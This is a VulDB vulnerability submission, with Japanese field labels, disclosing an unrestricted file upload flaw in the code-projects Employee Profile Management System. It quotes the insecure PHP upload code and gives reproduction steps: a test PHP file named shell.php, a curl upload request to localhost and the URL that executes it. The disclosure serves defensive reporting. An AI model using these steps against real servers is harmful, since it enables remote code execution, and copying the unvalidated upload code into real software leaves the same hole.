| タイトル | code-projects Employee Profile Management System published November 15, 2025 Unrestricted Upload |
|---|
| 説明 | Summary
The vulnerability exists in the file upload component (Profiling/add_file_query.php) due to missing validation of uploaded file types and content. The application allows arbitrary files—including executable .php files—to be uploaded into a web-accessible directory.
Root Cause
The server stores uploaded files directly under Profiling/uploads/ using the original filename from the client:
$target_dir = "uploads/";
$target_file = $target_dir . basename($_FILES["per_file"]["name"]);
move_uploaded_file($_FILES["per_file"]["tmp_name"], $target_file);
There is no extension restriction, no MIME checking, no content inspection, no filename randomization, and the upload directory is inside the web root. Therefore, a user can upload a PHP file that the server later executes.
Reproduction
Login as a normal user who has access to the “Add File” feature.
Upload the following file as shell.php:
<?php echo "EXECUTED: " . __FILE__; ?>
Send the upload request (example using curl):
curl -X POST "http://localhost/Profiling/add_file_query.php" \
-F "per_name=1" \
-F "[email protected]" \
-F "upload=Save"
Access the uploaded file directly:
http://localhost/Profiling/uploads/shell.php
The PHP code executes and prints the message, confirming arbitrary code execution.
Impact
This allows remote attackers to upload and execute arbitrary PHP code on the server. Successful exploitation leads to full server compromise, including command execution, data theft, privilege escalation, and persistent backdoor installation. |
|---|
| ソース | ⚠️ https://github.com/shenxianyuguitian/employee-management-UFU |
|---|
| ユーザー | xuanyuesanshi (UID 88126) |
|---|
| 送信 | 2025年11月21日 08:26 (5 月 ago) |
|---|
| モデレーション | 2025年12月06日 18:22 (15 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 334615 [code-projects Employee Profile Management System 1.0 add_file_query.php per_file 特権昇格] |
|---|
| ポイント | 20 |
|---|